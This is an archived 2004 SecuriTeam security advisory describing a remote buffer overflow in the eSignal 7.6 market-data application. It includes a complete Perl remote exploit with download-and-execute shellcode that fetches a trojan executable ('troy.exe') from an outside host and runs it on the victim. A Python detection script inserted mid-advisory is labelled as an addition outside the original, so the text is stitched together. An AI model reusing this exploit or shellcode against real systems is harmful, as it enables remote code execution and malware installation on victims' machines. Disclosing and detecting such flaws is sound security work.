[NT] eSignal Remote Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
To: list@securiteam.com Date: 30 Mar 2004 13:07:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
eSignal Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
"eSignal (http://www.esignal.com) is the nation's leading provider of
real-time financial and market information. eSignal is a popular platform
for institutional and professional traders. eSignal is a market data
solution bundled for best value for small to mid-size institutional
investors that also includes additional optional services."
A remote buffer overflow condition exists in eSignal due to invalid bounds
checking when receiving requests.
DETAILS
Vulnerable Systems:
* eSignal version 7.6 and prior
The main application WinSig.exe is listening for incoming data on TCP port
80. However, when parsing the incoming requests it suffers from a classic
buffer overflow condition when the parameter string exceeds about 1040
characters. A proof-of-concept:
<STREAMQUOTE>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....... x 1040
</STREAMQUOTE>
The overflow occurs in Specs.dll and the instruction pointer (EIP) is
totally under our control. There can be no NULL character in the crafted
payload and all lower-case characters are converted to upper case. Since
the MFC71.dll file contains the "jmp esp" instruction it is trivial to
overflow the application and direct the code to the payload.
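As an added defensive example (not part of the advisory or of eSignal), a small Python check that inspects payloads captured on the way to the eSignal listener and flags <STREAMQUOTE> parameters that reach the roughly 1040-character overflow threshold, contain non-printable bytes, or consist of long runs of one byte. The sample payloads and the 64-byte run threshold are constructed assumptions.

```python
import re

# Threshold from the advisory: WinSig.exe overflows once the <STREAMQUOTE>
# parameter string exceeds about 1040 characters.
MAX_PARAM_LEN = 1040
STREAMQUOTE_RE = re.compile(rb"<STREAMQUOTE>(.*?)</STREAMQUOTE>", re.DOTALL)


def inspect_request(payload: bytes) -> dict:
    """Classify one TCP payload sent to the eSignal listener (port 80)."""
    m = STREAMQUOTE_RE.search(payload)
    if not m:
        return {"streamquote": False, "suspicious": False, "reasons": []}
    param = m.group(1)
    reasons = []
    if len(param) >= MAX_PARAM_LEN:
        reasons.append(f"parameter length {len(param)} >= {MAX_PARAM_LEN}")
    # A legitimate quote request is printable text; NOP sleds, filler and
    # shellcode are not (the advisory notes the payload avoids NUL bytes,
    # but bytes such as 0x90 and 0xcc still stand out).
    nonprint = sum(1 for b in param if b < 0x20 or b > 0x7E)
    if nonprint:
        reasons.append(f"{nonprint} non-printable bytes in parameter")
    # Assumed heuristic: 64+ repeats of one byte looks like a sled or filler.
    if re.search(rb"(.)\1{63,}", param):
        reasons.append("run of 64+ identical bytes (sled/filler pattern)")
    return {"streamquote": True, "suspicious": bool(reasons),
            "reasons": reasons, "length": len(param)}


# Constructed sample payloads: a normal symbol request, the advisory's
# 1040 x 'A' proof-of-concept shape, a sled-prefixed request and plain HTTP.
SAMPLES = [
    b"<STREAMQUOTE>MSFT</STREAMQUOTE>",
    b"<STREAMQUOTE>" + b"A" * 1040 + b"</STREAMQUOTE>",
    b"<STREAMQUOTE>" + b"\x90" * 10 + b"QUOTE</STREAMQUOTE>",
    b"GET / HTTP/1.0\r\n\r\n",
]


def scan_samples(samples):
    """Return (index, result) for every payload that should raise an alert."""
    hits = []
    for i, payload in enumerate(samples):
        result = inspect_request(payload)
        if result["suspicious"]:
            hits.append((i, result))
    return hits


if __name__ == "__main__":
    for i, result in scan_samples(SAMPLES):
        print(f"sample {i}: {'; '.join(result['reasons'])}")
```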
Exploit:
An exploit code in Perl for the buffer overflow is presented below:
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*=
# http://viziblesoft.com/insect
#
# 25-Mar-2004
#
use IO::Socket;
sub usage
{
die("\nUsage: perl $0 host port\n");
}
print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";
#
# Used api..
#
$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";
$movsb =
"\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";
#
# xor data block
#
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};
$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "\r\n";
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "\n";
print sendraw($data);
print "[+] Overflow sent / file executed!\n";
exit;
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...\n"); }}
The exploit can also be found at
http://viziblesoft.com/insect/sploits/vz-eSignal76.pl
ADDITIONAL INFORMATION
The information has been provided by Vizzy (vizzy@freemail.hu).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.